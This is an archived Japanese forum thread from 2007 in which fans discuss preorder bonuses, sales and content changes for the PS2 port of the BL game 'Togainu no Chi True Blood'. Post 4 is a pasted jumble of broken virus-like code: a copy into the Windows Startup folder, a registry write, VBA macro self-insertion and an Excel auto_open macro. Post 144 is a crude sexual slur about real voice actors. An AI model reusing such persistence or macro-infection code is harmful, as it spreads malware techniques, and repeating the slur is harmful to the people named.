5ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

BL@咎狗の血 True Blood 4 【Nitro+CHiRAL】

1 :名無しって呼んでいいか?:2007/09/29(土) 12:15:09 ID:???
PS2で2007年11月29日 発売予定
公式 http://www.togainu.com/

前スレ
BL@咎狗の血 True Blood 3 【Nitro+CHiRAL】
http://game12.2ch.net/test/read.cgi/ggirl/1189779567/

■雑誌等新情報バレは2日間はメル欄で。本編バレは発売一週間後に解禁
■PC版の過度のバレを含む話は大人板(※18禁)へ
■オークションを含む転売に関する話は自重
■You Tube、ニコニコ動画、Winny等、動画共有に関する話題は禁止
■次スレは>>980
■sage進行推奨

2 :名無しって呼んでいいか?:2007/09/29(土) 12:38:56 ID:???
>>1乙華麗!

まだあきらめてませんよ…ニトダイ!

ニトダイ □PS2版「咎狗の血」の取扱については全て未定の状態です。


キャラアニ「スクールカレンダー」
セガ「スクールカレンダー」
※カレンダーは同じもの

メッセ「ユキヒトの過去」「ジョイまっくす×アキラ」※LE【初回限定版】のみにさらなるオマケグッズ特典企画中!!
兄友「アキラとケイスケの日常」「ユキヒトvsジョイまっくす」
虎穴「リンと源泉の出会い」「謎の男×ジョイまっくす」
Glep「ジョイまっくすvsケイスケ」
ゲマズ「源泉×ジョイまっくす」※限定版のみの特典です
祖父「シキ×ジョイまっくす」
ワンダー「リンvsジョイまっくす」※限定版のみの特典です

咎狗の特典情報から商品ページに飛べます
ttp://www.coara.or.jp/~kanat/tokuten.htm

追加情報ヨロ!

3 :名無しって呼んでいいか?:2007/09/29(土) 12:40:00 ID:???
■虎週間ランキング
1位 LE(CD無し)
2位 LE(CD付き)
3位 通常版(CD無し)
3位 通常版(CD付き)
月間ランキング3位 LE(CD無し)

■Glep予約ソフト売れ筋ランキング
1位 LE
2位 通常版

■兄友売り上げランキング 咎狗(LE)
総合3位
総合女性2位
世代別未成年6位
世代別20代1位
世代別30代以降4位
カテゴリ別ゲーム1位(LE)&6位(通常版)

■祖父売り上げランキング
6位 LE

■ゲマズ
イチオシ商品にLEが掲載

■セガ通常版は売り切れ ※LEはあります

4 :名無しって呼んでいいか?:2007/09/29(土) 13:47:18 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


5 :名無しって呼んでいいか?:2007/09/29(土) 15:12:34 ID:???
>>1
おつ!
期待と不安にドキがムネムネ
自分もPS2本体からの購入組だお

6 :名無しじゃなきゃダメなのぉ!:2007/09/29(土) 15:28:55 ID:???
>>1
乙!

自分は本体持ってるけど、最近使ってなかったから埃がw
狗のために拭き拭きするお!

7 :名無しって呼んでいいか?:2007/09/29(土) 16:41:17 ID:???
>>1乙(`・ω・´)b

うちも本体はあるんだが……
メモカ足りないよメモカ
安い時狙って買っておこ。

8 :名無しって呼んでいいか?:2007/09/29(土) 17:40:24 ID:???
>>1 乙

前スレ999
自分も時々気になるんでIEでそれ確認する為だけにここ見るw
前は無料で応募できる懸賞スレが大人気で、あぁみんな複数買いで
金困ってるんだろうなぁとかオモタ。

9 :名無しって呼んでいいか?:2007/09/29(土) 23:15:11 ID:???
>>2
いつも乙です
まとめページは個人サイトだと思うから、公式にした方がいいんじゃないかな

10 :名無しって呼んでいいか?:2007/09/29(土) 23:47:47 ID:???
つーか、自演?

11 :名無しって呼んでいいか?:2007/09/29(土) 23:51:41 ID:???
>>1
乙であります( `・ω・´)ゞ

12 :名無しって呼んでいいか?:2007/09/30(日) 00:20:07 ID:???
■追加情報ヨロ!

ニトダイ □PS2版「咎狗の血」の取扱については全て未定の状態です。


キャラアニ「スクールカレンダー」
セガ「スクールカレンダー」
※カレンダーは同じもの

メッセ「ユキヒトの過去」「ジョイまっくす×アキラ」※LE【初回限定版】のみにさらなるオマケグッズ特典企画中!!
兄友「アキラとケイスケの日常」「ユキヒトvsジョイまっくす」
虎穴「リンと源泉の出会い」「謎の男×ジョイまっくす」
Glep「ジョイまっくすvsケイスケ」
ゲマズ「源泉×ジョイまっくす」※限定版のみの特典です
祖父「シキ×ジョイまっくす」
ワンダー「リンvsジョイまっくす」※限定版のみの特典です


商品ページに飛べます(一部直では飛べません)
ttp://www.togainu.com/spec/limited.html

13 :名無しって呼んでいいか?:2007/09/30(日) 00:23:56 ID:???
>>2とか>>3ってテンプレだった?
だったら貼り忘れスマソ

14 :名無しって呼んでいいか?:2007/09/30(日) 00:24:03 ID:???
>>9
助言dです
もしかしてサイトさんに迷惑かかってたのかな・・申し訳ない
次に何か情報でたら訂正しようと思ったんだけど先に直しますね

15 :名無しって呼んでいいか?:2007/09/30(日) 00:27:00 ID:???
>>13
違うよ
あったほうがいいかなと思って勝手に書いてたんだけど
迷惑ならやめるからその時は言ってください

16 :名無しって呼んでいいか?:2007/09/30(日) 01:01:04 ID:???
>>15
http://www.togainu.com/spec/limited.html#shop
http://www.kadokawa.co.jp/game/game/tokuten/togainu_tokuten.html
公式にあるからね

17 :名無しって呼んでいいか?:2007/09/30(日) 08:04:29 ID:???
前スレでニトダイに特典がつくのかどうか、
2回メールで問い合せた者です。
今更になってやっとキラルからメール来た


プレイステーション2専用ソフト『咎狗の血 True Blood』は、角川書店さまの
商品となりますので、『咎狗の血 True Blood』に関するご意見・ご質問等は、
販売元の角川書店さまへお問い合わせいただければ幸いです。

また、弊社通販サイトでの『咎狗の血 True Blood』予約購入特典につきましては、
お手数をおかけいたしますが、「ニトロプラス ダイレクト」のメールフォームから
お問い合わせください。


初めてキラルに問い合せたから、購入特典については
ニトダイに問い合せた方が良かったのか…
TOPにあるメールに問い合せてました
よく分かってなくてゴメ(´・ω・`)

18 :名無しって呼んでいいか?:2007/09/30(日) 08:49:08 ID:???
いや…それでも2通も送って待たせておいてそりゃねーべ…
どうせ届く所は同じだろうに

19 :名無しって呼んでいいか?:2007/09/30(日) 09:10:25 ID:???
通販部とキラルは分かれてるんだろうよ
どちらにせよ乙

ニトダイは多分未定ですとしか帰ってこないんだろうな…

20 :名無しって呼んでいいか?:2007/09/30(日) 12:07:39 ID:???
>>17
なんかこう…ほんとどうでもいい感じなんだな、うん

21 :名無しって呼んでいいか?:2007/09/30(日) 13:31:35 ID:???
>>17
乙です
一個しか買えないからニトダイに決めてたんだけど…
今から兄に予約して特典つくかなぁ
何かどうでもよくなってきた

22 :名無しって呼んでいいか?:2007/09/30(日) 13:56:13 ID:???
>>17
乙です。公式がグダグダだと、どうでもよくなりますね(´・ω・`)

23 :名無しって呼んでいいか?:2007/09/30(日) 14:03:01 ID:???
PS2版の公式はキラル(ニトロ)じゃないってことさ

24 :名無しって呼んでいいか?:2007/09/30(日) 14:03:48 ID:???
といって現在の公式である角川がちゃんと力入れてくれてるという訳でもない…
かわいいうちのアキラたんが、不憫や。
おいちゃんがこうたるで。

25 :名無しって呼んでいいか?:2007/09/30(日) 18:56:11 ID:???
オラはアキラたんのパトロネスになる!

26 :名無しって呼んでいいか?:2007/10/01(月) 06:13:11 ID:???
じゃあ私はパトレストね

27 :名無しって呼んでいいか?:2007/10/01(月) 16:47:41 ID:???
冷微ホムペの付録DVDのとこに狗の名前あるんだけど
夏コミのデモ来るのかな

28 :名無しって呼んでいいか?:2007/10/01(月) 17:52:19 ID:???
買おうか迷ってる。
PS2版はエロなしですか?つうか18禁じゃない?


29 :名無しって呼んでいいか?:2007/10/01(月) 17:55:33 ID:???
無しだよ。(なしだよな…?
何禁になるかはまだ決まってないみたい。
買おうか迷っているなら…買っちまえよ…!
おもしろくなくても責任とれないけど
ファンとしては、どうしようかなーと言ってるひとの背中は
バンバン押したくなってしまう。


30 :名無しって呼んでいいか?:2007/10/01(月) 18:02:55 ID:???
>>28
エロは無し
CEROのレーティングにPCみたいな18禁ってのはないし
ライターが18以下にも楽しんでもらいたい的な発言してるから対象年齢は下がると思う

31 :名無しって呼んでいいか?:2007/10/01(月) 19:38:27 ID:???
18禁部分のシナリオがなくなる代わりに、新しいシナリオって入るのかね?

32 :名無しって呼んでいいか?:2007/10/01(月) 19:41:49 ID:???
エログロを抜くとストーリーに差し障りがあるようなルートは
加筆修正されるんじゃね
あとそれにともなう新規スチルの追加とか

33 :名無しって呼んでいいか?:2007/10/01(月) 20:29:18 ID:???
皆ありがとう。
咎狗ヤるの初めてで何も分からなかったんだ。
エロなしでもいいや。とりあえず予約して来る!!

34 :名無しって呼んでいいか?:2007/10/02(火) 03:14:39 ID:???
発売まであと58日か
…………みんな……
………………………
…狗への愛は残ってるよね?

35 :名無しって呼んでいいか?:2007/10/02(火) 04:07:06 ID:???
もちろんさ!

36 :名無しって呼んでいいか?:2007/10/02(火) 07:02:13 ID:???
愛は残ってるさ!!
TB期待のテンションはあまり残ってないけどね!!
ニトダイのやる気の無さにかなり減ったのでorz

37 :名無しって呼んでいいか?:2007/10/02(火) 09:01:15 ID:???
>>34
PCで遊ぶつもりだから、PS2接続おkな24型モニターとグラフィックカードを
ほぼ狗のために新調したくらいには愛(萌え)はあるともさ!

38 :名無しって呼んでいいか?:2007/10/02(火) 11:59:25 ID:???
自分はPS2本体から購入組で今から買っておこうと思ったのですが
PS2って冬限定モデルとかって毎年出てるんですかね?
定価で買うつもりだから新色とかあればそっちが欲しいかもと

スレ違いですいません…


39 :名無しって呼んでいいか?:2007/10/02(火) 12:20:07 ID:???
スレ違ってわかってるならハードの公式サイト見なよ

40 :名無しって呼んでいいか?:2007/10/02(火) 12:59:52 ID:???
吉Pのキャピキャピインタブーで萎え
まろPUSHで萎え
ニトダイで萎え
新規スチルで萎え

それでも私は元気です(´・ω・`)

41 :名無しって呼んでいいか?:2007/10/02(火) 14:13:35 ID:???
雑誌は意地でも見ないkonozama予約の自分
もしかして勝ち組すかw

42 :名無しって呼んでいいか?:2007/10/02(火) 14:45:30 ID:???
萎えたい奴は何見ても萎えたくてたまらないんだから勝手に萎えさせとけ

楽しみでたまらないよアキラァアアアアアアアア!!!!!!

43 :名無しって呼んでいいか?:2007/10/02(火) 15:46:46 ID:???
>>40
CSの度重なる強敵に挫けそうになるが
まだ戦えるぞ(`・ω・´)

44 :名無しって呼んでいいか?:2007/10/02(火) 20:39:21 ID:???
ケイアキとリンアキ好きだから出る限りは買う

45 :名無しって呼んでいいか?:2007/10/02(火) 21:52:25 ID:???
兄の特典CD画像キタ

46 :名無しって呼んでいいか?:2007/10/02(火) 21:53:58 ID:???
使いまわしktkr
まぁ重要なのは中身だよね!

47 :名無しって呼んでいいか?:2007/10/02(火) 21:54:03 ID:???
しょぼ…

48 :名無しって呼んでいいか?:2007/10/02(火) 21:58:18 ID:???
なんでサンプル画像モトアキなん

49 :名無しって呼んでいいか?:2007/10/02(火) 22:02:40 ID:???
商品ページにはない・・・

50 :名無しって呼んでいいか?:2007/10/02(火) 22:04:00 ID:???
アニメイトTVのほうか・・・

51 :名無しって呼んでいいか?:2007/10/02(火) 22:14:41 ID:???
ほんと特典に書下ろし1点も無いとか切なすぎる…

52 :名無しって呼んでいいか?:2007/10/02(火) 22:18:21 ID:???
まだCDジャケという手があるだろ

53 :名無しって呼んでいいか?:2007/10/02(火) 22:22:29 ID:???
ttp://shop.frontierworks.jp/ProductImages/s-%83~%83j%83h%83%89%83%7D&%94%9A%8F%CE.jpg

せんすない

54 :名無しって呼んでいいか?:2007/10/02(火) 22:23:44 ID:???
>>53
これはひどい(・ω・`)

55 :名無しって呼んでいいか?:2007/10/02(火) 22:25:00 ID:???
CDジャケは無くて、ただの透明ケースに違いない

56 :名無しって呼んでいいか?:2007/10/02(火) 22:28:58 ID:???
>>55
だろうね

57 :名無しって呼んでいいか?:2007/10/02(火) 22:30:54 ID:???
>>53
ちょww
ほんとセンスないな

58 :名無しって呼んでいいか?:2007/10/02(火) 22:32:48 ID:???
絶望した

59 :名無しって呼んでいいか?:2007/10/02(火) 22:39:36 ID:???
たたなが「これは流石に描きおろさないとマズイ」的な
最低限な物しか描かなかっただろうと予測
(ジャケ絵と新スチルとユキヒトの立ち絵のみ?)
特典に描き下ろしは無理だろうね

60 :名無しって呼んでいいか?:2007/10/02(火) 22:46:53 ID:???
まほうのじゅもん
(特典が)あるだけマシ

61 :名無しって呼んでいいか?:2007/10/02(火) 22:47:27 ID:???
絶望ラジオ、
マロの中は『受け』なのか『攻め』なのかで緊急特番が!?BL好きな腐女子の皆様、要注目です
マロアキかアキマロかなのかの方を考えてしまうw

62 :名無しって呼んでいいか?:2007/10/02(火) 22:50:28 ID:???
逆に考えるんだ
何も無いよりはマシ

…なんつってー

63 :名無しって呼んでいいか?:2007/10/02(火) 23:31:57 ID:???
ツンデレ×ツンデレ

64 :名無しって呼んでいいか?:2007/10/02(火) 23:52:15 ID:???
あるだけマシ
ないよりマシ と…((φ(・ω・ )メモメモ

65 :名無しって呼んでいいか?:2007/10/03(水) 00:02:26 ID:???
どんなに辛くてもその二言忘れるなよ

あと発売後の検定に出るからな
今から100回ずつ書き取りしとけ

66 :名無しって呼んでいいか?:2007/10/03(水) 00:04:52 ID:???
おk、頑張ってコピペする

67 :名無しって呼んでいいか?:2007/10/03(水) 00:43:16 ID:???
発売後はこのスレにその二言が並ぶのか…
よしコピペしよう

68 :名無しって呼んでいいか?:2007/10/03(水) 02:30:16 ID:???
あるだけマシ ないよりm
よし、TBで一括変換できるように登録しますね。

69 :名無しって呼んでいいか?:2007/10/03(水) 10:29:02 ID:???
CS版はフィクションであり
PC版における登場人物・団体などとは一切関係ありません

これもな!

70 :名無しって呼んでいいか?:2007/10/03(水) 10:57:35 ID:???
>>69
正論だw
甘いちゃってPがほざいてるらしいし、もう別物としか考えれねー

71 :名無しって呼んでいいか?:2007/10/03(水) 11:32:59 ID:???
虹系みたく猫主との差別化で変に老けたアキラァにされるよりいいや
アキラたんのかわいいとこいっぱい見せてくれよ

72 :名無しって呼んでいいか?:2007/10/03(水) 11:47:33 ID:???
どんなにネガキャンされども我が心は折れぬ

73 :名無しって呼んでいいか?:2007/10/03(水) 12:02:42 ID:???
まだだ、まだ挫けんよ!

74 :名無しって呼んでいいか?:2007/10/03(水) 12:07:23 ID:???
むしろ発売後に心が折れないようにするためのネガキャンですよ

75 :名無しって呼んでいいか?:2007/10/03(水) 13:38:45 ID:???
>甘いちゃ

翻訳よろしく

76 :名無しって呼んでいいか?:2007/10/03(水) 14:32:55 ID:???
甘々+いちゃいちゃ=甘いちゃ

77 :名無しって呼んでいいか?:2007/10/03(水) 15:09:51 ID:???
あー吉Pが言ってたやつか
ほんま空気嫁だわ

78 :名無しって呼んでいいか?:2007/10/03(水) 16:00:25 ID:???
雰囲気はわかるんだが言葉選びのセンスが悪いな

79 :名無しって呼んでいいか?:2007/10/03(水) 17:29:49 ID:???
そんな中でアキラたんのOOOをムハムハしたい。

80 :名無しって呼んでいいか?:2007/10/03(水) 17:34:47 ID:???
みんながする、みんなができるんです

81 :名無しって呼んでいいか?:2007/10/03(水) 18:39:54 ID:???
甘いちゃなんてクソ猫でやってろ

82 :名無しって呼んでいいか?:2007/10/03(水) 19:22:07 ID:???
もふもふ

83 :名無しって呼んでいいか?:2007/10/03(水) 19:22:34 ID:???
ほんとだよ
甘いのは猫で十分だ

84 :名無しって呼んでいいか?:2007/10/03(水) 19:50:01 ID:???
全年齢の板だって事に気づいてくれ

85 :名無しって呼んでいいか?:2007/10/03(水) 20:05:14 ID:???
移植もいいけど完全版出て欲しかった


86 :名無しって呼んでいいか?:2007/10/03(水) 20:55:28 ID:???
アキラだけかと思ったらでかシキも出るんだな
ちみがデカいなんて・・・!

87 :名無しって呼んでいいか?:2007/10/03(水) 21:59:59 ID:???
吉Pの雑誌インタヴューを読めば読むほど
移植への希望が絶たれていく気がする。
そんなわけでまだ予約してない自分が一番勝ち組かもしれん。
ワゴンで会うまで待つかな。

88 :名無しって呼んでいいか?:2007/10/03(水) 22:01:30 ID:???
楽しみで心のハリにできる自分が一番の勝ち組です

89 :名無しって呼んでいいか?:2007/10/03(水) 22:03:45 ID:???
7本予約した私こそ勝ち組!

90 :名無しって呼んでいいか?:2007/10/03(水) 22:06:20 ID:???
>>87
分かってないなぁ
内容にお金払うんじゃない
咎狗の血という名前にお金払うんだ

91 :名無しって呼んでいいか?:2007/10/03(水) 22:17:04 ID:???
>>89
4本の自分からリスペクト&嫉妬を送る

ちなみにPC版は5本予約買いしたので
ある意味CSの方が期待度下がってると言えるのかなぁ
全然そんなことはないけどね。

92 :名無しって呼んでいいか?:2007/10/04(木) 00:33:33 ID:???
TrueBloodという名前に1本以上のお金を払う気がしない…今は
発売後に後悔するかも試煉が

後悔できるくらいの出来ならいいよね

93 :いけない名無しさん:2007/10/04(木) 01:12:49 ID:???
ユキヒトの今出てる情報、外見とか設定とか声優が好みなので
ユキヒトルート凄く楽しみにしてる
CP版のアキラは受動的な所が多かったので
対等な相手ならまた違ったアキラが見られるかもしれないし

甘いちゃは…既存キャラの新規EDや追加エピが増えている
布石だとこれも楽しみに受けとめておく。今は。

94 :名無しって呼んでいいか?:2007/10/04(木) 01:13:39 ID:???
コノエファンの※ツマンネだった

95 :名無しって呼んでいいか?:2007/10/04(木) 01:18:22 ID:???
新しいイベントで新しいアキラが見られると思うと楽しみ倍増

96 :93:2007/10/04(木) 01:18:53 ID:???
ごめんクッキー残ってた

97 :名無しって呼んでいいか?:2007/10/04(木) 17:03:57 ID:???
買って吉と出るか凶とでるか
スリルとサスペンス

98 :名無しって呼んでいいか?:2007/10/04(木) 17:10:10 ID:???
……狂気にまみれろよ。



この一言で狂喜にまみれたw
中の人…言葉選ぶの上手いなw

99 :名無しって呼んでいいか?:2007/10/04(木) 17:12:06 ID:???
そんな台詞あったっけ

100 :名無しって呼んでいいか?:2007/10/04(木) 17:15:16 ID:???
>>99
つ公式のインタビュー

101 :名無しって呼んでいいか?:2007/10/04(木) 17:58:29 ID:???
狂気にまろ見えよ。

102 :名無しって呼んでいいか?:2007/10/04(木) 19:34:21 ID:???
きーやんおもろw

103 :名無しって呼んでいいか?:2007/10/04(木) 20:24:07 ID:???
出張するなカス

104 :名無しって呼んでいいか?:2007/10/04(木) 20:28:06 ID:???
>>103
出張???
誤爆?

105 :名無しって呼んでいいか?:2007/10/04(木) 20:30:53 ID:???
ヲタが迷惑掛けるの何度目かね
まあもちつけ

106 :名無しって呼んでいいか?:2007/10/05(金) 22:37:49 ID:???
新スチルよかった

107 :名無しって呼んでいいか?:2007/10/06(土) 01:06:12 ID:???
公式の特典情報見やすくなったな
なぜもっと早くこうしなかったとはあえて言わないでおく

108 :名無しって呼んでいいか?:2007/10/06(土) 01:10:20 ID:???
>>106
一枚くらい公式にうpしろよキラルァァアア

109 :名無しって呼んでいいか?:2007/10/06(土) 01:54:44 ID:???
>>107
ココ見ながら少しずつ補強してんじゃない?

110 :名無しって呼んでいいか?:2007/10/06(土) 03:15:08 ID:???
だったらもっと期待させるような何かが出てるはずだからそれはないw

111 :名無しって呼んでいいか?:2007/10/06(土) 03:20:01 ID:???
>>98
信者まできもいとはな

112 :名無しって呼んでいいか?:2007/10/06(土) 05:39:46 ID:???
>>111
お前ほどじゃないよ

113 :名無しって呼んでいいか?:2007/10/06(土) 07:16:35 ID:???
必死すぎ

114 :名無しって呼んでいいか?:2007/10/06(土) 09:58:11 ID:???
>>113
お前ほどじゃないよ

115 :名無しって呼んでいいか?:2007/10/06(土) 10:51:35 ID:???
      信  ( ゚д゚) 者
       \/| y |\/

    二つ合わされば「儲かる」となる

        ( ゚д゚) 儲かる
        (\/\/

116 :名無しって呼んでいいか?:2007/10/06(土) 12:07:32 ID:???
>>115
この世の心理を見た
お前頭いいな

117 :名無しって呼んでいいか?:2007/10/06(土) 13:06:36 ID:???
>>115は実はイルレ
おいちゃん久々に感動したよ

118 :名無しって呼んでいいか?:2007/10/07(日) 02:37:01 ID:???
これの儲かる→信者ならどっかでみかけたことあるわ

119 :名無しって呼んでいいか?:2007/10/07(日) 03:25:10 ID:???
市況板ではさんざん外出

120 :名無しって呼んでいいか?:2007/10/07(日) 03:29:57 ID:???
ですよねー

今週はインタビュー更新なくて残念です

121 :名無しって呼んでいいか?:2007/10/07(日) 10:48:44 ID:???
公式のフラッシュ変わったの?ナノ。

122 :名無しって呼んでいいか?:2007/10/07(日) 11:50:03 ID:???
新規さ、結構内容知ってる奴多いんじゃないの
ケイスケのあれとかシキアキのEDとか

123 :名無しって呼んでいいか?:2007/10/07(日) 11:51:51 ID:???
エログロ表現が減ろうと何しようと
まがりなりにもBLだからなぁ
そういう系統買うってことはそういう人種なんだから
ほとんど知ってると思うよ
自分もPC版買う前に情報調べまくってたし

124 :名無しって呼んでいいか?:2007/10/07(日) 11:55:34 ID:???
谷山きしょい

125 :名無しって呼んでいいか?:2007/10/07(日) 12:46:19 ID:???
谷山かっこいい

126 :名無しって呼んでいいか?:2007/10/07(日) 12:48:12 ID:???
谷山アンチも信者もどっか池

127 :名無しって呼んでいいか?:2007/10/07(日) 21:59:56 ID:???
そして誰もいなくなった

128 :名無しって呼んでいいか?:2007/10/08(月) 09:30:59 ID:???
谷山ってなに?ガクトファンいますか??

129 :名無しって呼んでいいか?:2007/10/08(月) 10:27:25 ID:???
マリス時代はファンだった

130 :名無しって呼んでいいか?:2007/10/08(月) 10:54:52 ID:???
谷山基地外荒らすなよ

131 :名無しって呼んでいいか?:2007/10/08(月) 11:14:54 ID:???
谷山最高 

132 :名無しって呼んでいいか?:2007/10/08(月) 11:17:20 ID:???
つか谷川って誰なんだ

133 :名無しって呼んでいいか?:2007/10/08(月) 11:32:05 ID:???
グンジの中の人

134 :名無しって呼んでいいか?:2007/10/08(月) 11:34:13 ID:???
>>132
谷川はハルヒの作者

135 :名無しって呼んでいいか?:2007/10/08(月) 12:12:37 ID:???
グンジはハルヒの作者

136 :名無しって呼んでいいか?:2007/10/08(月) 12:28:38 ID:???
谷山より小西が市ね

137 :名無しって呼んでいいか?:2007/10/08(月) 12:38:38 ID:???
小西は最高でしょ

138 :名無しって呼んでいいか?:2007/10/08(月) 12:47:55 ID:???
なんかのさなぎは神

139 :名無しって呼んでいいか?:2007/10/08(月) 13:14:08 ID:???
何この流れ

140 :名無しって呼んでいいか?:2007/10/08(月) 14:23:58 ID:???
>>138
('A`)人('A`)ナカーマ

141 :名無しって呼んでいいか?:2007/10/08(月) 18:33:50 ID:???
>>137
あーこれがメス豚信者か

142 :名無しって呼んでいいか?:2007/10/08(月) 18:40:22 ID:???
声ヲタもアンチも他へ行ってくれ

143 :名無しって呼んでいいか?:2007/10/08(月) 18:52:17 ID:???
>>141
あーこれが耳の腐った不感症か

144 :名無しって呼んでいいか?:2007/10/08(月) 18:59:18 ID:???
平野綾は谷山紀章の肉便器確定で平野信者発狂w
http://ex21.2ch.net/test/read.cgi/voiceactor/1187409404/

145 :名無しって呼んでいいか?:2007/10/08(月) 19:07:17 ID:???
声優ネタはもういいよ・・・

146 :名無しって呼んでいいか?:2007/10/08(月) 19:10:32 ID:???
特典にカリスマペン付けてくだしあ

147 :名無しって呼んでいいか?:2007/10/08(月) 19:12:57 ID:???
>>146
ノックしたら喋るんだよね?
雑魚が!とか

148 :名無しって呼んでいいか?:2007/10/08(月) 19:56:12 ID:???
カリスマペンwww
カリスマの形してるのか?

149 :名無しって呼んでいいか?:2007/10/08(月) 19:58:49 ID:???
日本刀の形です。

150 :名無しって呼んでいいか?:2007/10/08(月) 20:04:11 ID:???
>>147
授業中いきなり
「雑魚が雑魚が雑魚が雑魚が雑魚が雑魚が雑魚が雑魚がああああああ」
とどこからともなく聞こえてくるのですね
それなんてジョジ○?

151 :名無しって呼んでいいか?:2007/10/08(月) 20:06:34 ID:???
どうしてもあの立ち絵のままペンになったのしか想像できない

152 :名無しって呼んでいいか?:2007/10/08(月) 20:23:18 ID:???
カリスマペンきめぇえええ!!!www

153 :名無しって呼んでいいか?:2007/10/08(月) 21:01:44 ID:???
>>150
ワロタwww

でも雑魚ペンイラネ

154 :名無しって呼んでいいか?:2007/10/08(月) 21:38:47 ID:???
雑魚ペンって呼ぶなww

155 :名無しって呼んでいいか?:2007/10/08(月) 21:43:07 ID:???
じゃあカリスマパンで

156 :名無しって呼んでいいか?:2007/10/08(月) 21:55:16 ID:???
カリスマパンは何味なのか

157 :名無しって呼んでいいか?:2007/10/08(月) 21:56:09 ID:???
それはネタバレになるので言えません><

158 :名無しって呼んでいいか?:2007/10/08(月) 22:00:01 ID:???
ちりめんじゃこがふんだんに入った雑魚パンです

159 :名無しって呼んでいいか?:2007/10/08(月) 23:09:53 ID:???
なんだこの流れ

でもカリスマペン吹いたw
カリスマの頭って、トゲトゲしてなくて親指で押しやすそうだよな

160 :名無しって呼んでいいか?:2007/10/08(月) 23:48:22 ID:???
アキラたんの頭は指先を刺激して脳内妄想を活性化させます

161 :名無しって呼んでいいか?:2007/10/08(月) 23:55:05 ID:???
おまえらここは一般スレですよ


162 :名無しって呼んでいいか?:2007/10/09(火) 08:45:05 ID:???
小西と小西厨は剣山にさされて氏ね

163 :名無しって呼んでいいか?:2007/10/09(火) 11:34:52 ID:???
>>143
コニタンの声に感じてんの?きめぇw

つかニトダイそろそろ発表してもいーんじゃないの…
無いなら無いでいいんだけど

164 :名無しって呼んでいいか?:2007/10/09(火) 11:46:16 ID:???
つい最近問い合わせた人がいたけど、何も決まって無いとかいう
返答きたみたいだし発表とか今さらないんじゃないのかな

165 :名無しって呼んでいいか?:2007/10/09(火) 11:57:29 ID:???
そろそろ決めないと特典なしでLEを買うはめになるよね…

166 :名無しって呼んでいいか?:2007/10/09(火) 12:10:30 ID:???
別に特典無いならニトダイで買うことない

167 :名無しって呼んでいいか?:2007/10/09(火) 12:20:34 ID:???
「未定」だから困るんだよ
無いなら無いって言ってもらった方が楽になれるんだよ

168 :名無しって呼んでいいか?:2007/10/09(火) 12:33:39 ID:???
ちょっとメールしてみるかな
未定じゃなくて、無いなら無いと発表してくれと
客に対してなんて不親切なメーカーなんだろうな
同人感覚殿様商売
サービス業の身としてはありえない程の営業体制

169 :名無しって呼んでいいか?:2007/10/09(火) 12:51:21 ID:???
一昨日のスパークでそれに関して質問した人とかいないの?

170 :名無しって呼んでいいか?:2007/10/09(火) 14:30:00 ID:???
>>168
他力本願ですまんがよろしく

171 :名無しって呼んでいいか?:2007/10/09(火) 14:43:01 ID:???
もしキラルに特典つかなかったら
角川が嫌いになりそう…

172 :名無しって呼んでいいか?:2007/10/09(火) 14:52:44 ID:???
角川関係無くないですか

ニトダイは一か月切っても発表無かったら諦めた方がいいだろうな

173 :名無しって呼んでいいか?:2007/10/09(火) 15:04:24 ID:???
>>172

17嫁

174 :名無しって呼んでいいか?:2007/10/09(火) 16:18:50 ID:???
安価位しろボケナス
しかも>>17の発表が出た上での話しだろうが

175 :名無しって呼んでいいか?:2007/10/09(火) 16:42:27 ID:???
>>174
>17の発表が出た上…?
「発表」??? 17の「発表」というのは「書き込み」のこと?
書き込みを読んだ上で…というなら
なおさら角川が関係ないと言ってる意味がわからん…

176 :名無しって呼んでいいか?:2007/10/09(火) 16:50:12 ID:???
馬鹿ばかりだね^^
↓次の方どうぞ

177 :名無しって呼んでいいか?:2007/10/09(火) 16:53:37 ID:???
>>176
ちゃんと説明できなくて
ごまかしてる176の方がバカに見えるよ?

178 :名無しって呼んでいいか?:2007/10/09(火) 16:54:33 ID:???
角川関係ないっつったの自分だけど
>>17のとおり、特典はニトダイが判断することだから
ニトダイに特典来ないのを角川の所為にするのはお門違いじゃね?って意味だったんだが

179 :名無しって呼んでいいか?:2007/10/09(火) 17:06:11 ID:???
>>178
>プレイステーション2専用ソフト『咎狗の血 True Blood』は、角川書店さまの 商品となりますので

わざわざキラルがこんな返事をよこすってことは
ニトダイでソフトを販売したり、特典を付けるにしても
いちいち角川の判断が必要なんじゃないの?…って思ったんだが

180 :名無しって呼んでいいか?:2007/10/09(火) 17:17:19 ID:???
>>179
いっそそのまま問い合わせてみれば良いんじゃないかい?
ここでいくら粘っても答えは返ってこないと思うよ

自分には17は文章の通りの意味にしか見えなかったから
深読みしすぎな気がしないでもないようなあるようなまぁそんな感じ

181 :名無しって呼んでいいか?:2007/10/09(火) 17:21:30 ID:???
m9。゚(゚^Д^゚)゚。プギャーッハハハヒャヒャヒャヒャ
>>174-175両方馬鹿だから安心しろよ^^

182 :名無しって呼んでいいか?:2007/10/09(火) 17:23:32 ID:???
↓次の話題ドゾー

183 :名無しって呼んでいいか?:2007/10/09(火) 17:29:40 ID:???
じゃあ>>168の返事待ちってことで…

弊社通販サイトでの『咎狗の血 True Blood』予約購入特典につきましては、
お手数をおかけいたしますが、「ニトロプラス ダイレクト」のメールフォームから
お問い合わせください。

ってことだから、質問は「ニトロプラス ダイレクト」のメールフォームからして下さい

